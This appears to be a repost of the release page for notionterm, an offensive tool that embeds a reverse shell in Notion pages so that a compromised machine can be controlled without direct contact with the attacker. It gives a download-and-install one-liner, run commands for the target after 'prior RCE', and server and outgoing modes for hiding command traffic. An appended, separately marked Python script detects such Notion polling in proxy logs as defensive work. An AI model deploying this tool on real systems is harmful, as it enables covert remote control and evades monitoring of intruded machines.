notionterm v1.0.1 releases: Embed reverse shell in Notion pages

Notion pages reverse shell

FOR ➕:

  • Hiding attacker IP in a reverse shell (No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell)
  • Demo
  • Quick proof insertion within the report
  • Highly available and shareable reverse shell (desktop, browser, mobile)
  • Encrypted and authenticated remote shell

NOT FOR ➖:

  • Long and interactive shell session (see tacos for that)

Why? 🤔

The focus was on making something fun while still being usable; it is not meant to be THE reverse shell solution in the pentester’s arsenal.

How

Just use Notion as usual and launch notionterm on the target.

Changelog v1.0.1

Helper script to ease usage and launching (without having to remember flags, etc.)

  • wrap-notionterm.sh

Install

Requirements 🖊️

  • Notion software and API key
  • Allowed HTTP communication between the target and the Notion domain
  • Prior RCE on target

From release: curl -lO -L https://github.com/ariary/notionterm/releases/latest/download/notionterm && chmod +x notionterm

Quickstart

Set-up

  1. Create the “reverse shell” page in Notion: Page template
  2. Give the permissions to notionterm to access the page (with the notion api key)

Run (details)

  1. Start notionterm
  2. Activate the reverse shell (with the ON button)
  3. Do your reverse shell stuff
  4. Shutdown the reverse shell (OFF)

👟 Run

# On target with prior RCE
./notionterm

Configuration can be made using:

  • Flags
  • Configuration table in the Notion page

Server mode

To quickly obtain a terminal in any Notion page, you can use server mode (requirement: an integration with write access to the page).

First, launch notionterm on the target with server mode enabled:

notionterm -serve [flags]

Then, when/where you want to get a terminal in your Notion page, create an embed block with a URL containing the page ID (CTRL+L to get it): https://[TARGET_URL]/notionterm?url=[PAGE_ID].

Wait…

And that’s all!

Outgoing mode

+: only target -> Notion page flow (i.e. no need to have an HTTP server reachable on the target)

notionterm -outgoing [flags]

Launch notionterm and immediately request the Notion page to retrieve the command to execute (it does not wait for the button to be clicked).
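Because the target must be allowed to reach the Notion domain, and outgoing mode carries only target -> Notion traffic, egress logs are where this activity is visible to a defender. The following is an added example, not part of notionterm or the original page: it scans a constructed proxy log for hosts in a server subnet that repeatedly contact Notion hostnames. The log format, subnet, hostname suffixes and user-agent strings are all assumptions.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime

# Assumption: Notion-owned hostname suffixes to watch; adjust to your own proxy/DNS data.
NOTION_SUFFIXES = ("notion.so", "notion.com")

# Constructed sample (not captured traffic): "<ISO time> <src ip> <method> <host> <path> <user agent>"
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.20.0.15 GET api.notion.com /v1/PLACEHOLDER example-client/1.0
2024-05-01T10:00:05 10.20.0.15 GET api.notion.com /v1/PLACEHOLDER example-client/1.0
2024-05-01T10:00:10 10.20.0.15 GET api.notion.com /v1/PLACEHOLDER example-client/1.0
2024-05-01T10:00:07 192.168.5.40 GET www.notion.so /workspace Mozilla/5.0 (X11; Linux x86_64)
2024-05-01T10:00:09 10.20.0.22 GET updates.example.org /index example-client/1.0
"""

def is_notion(host):
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in NOTION_SUFFIXES)

def notion_egress_from_servers(log_text, server_nets, min_hits=2):
    """Return {src_ip: summary} for server-subnet hosts that contact Notion repeatedly."""
    nets = [ipaddress.ip_network(n) for n in server_nets]
    seen = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split(maxsplit=5)
        if len(parts) < 6:
            continue  # malformed line
        ts, src, _method, host, _path, agent = parts
        try:
            addr = ipaddress.ip_address(src)
            when = datetime.fromisoformat(ts)
        except ValueError:
            continue  # unparsable address or timestamp
        if is_notion(host) and any(addr in n for n in nets):
            seen[src].append((when, agent))
    findings = {}
    for src, hits in seen.items():
        if len(hits) < min_hits:
            continue
        times = sorted(t for t, _ in hits)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        findings[src] = {
            "requests": len(hits),
            "max_gap_s": max(gaps, default=0.0),  # small, steady gaps suggest polling
            "non_browser": all(not a.startswith("Mozilla/") for _, a in hits),
        }
    return findings

if __name__ == "__main__":
    print(notion_egress_from_servers(SAMPLE_LOG, ["10.20.0.0/16"]))
```

A server that has no business using Notion should produce no findings here; blocking that egress at the proxy removes the "allowed HTTP communication" requirement listed above.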

Copyright (C) 2022 ariary 

Source: https://github.com/ariary/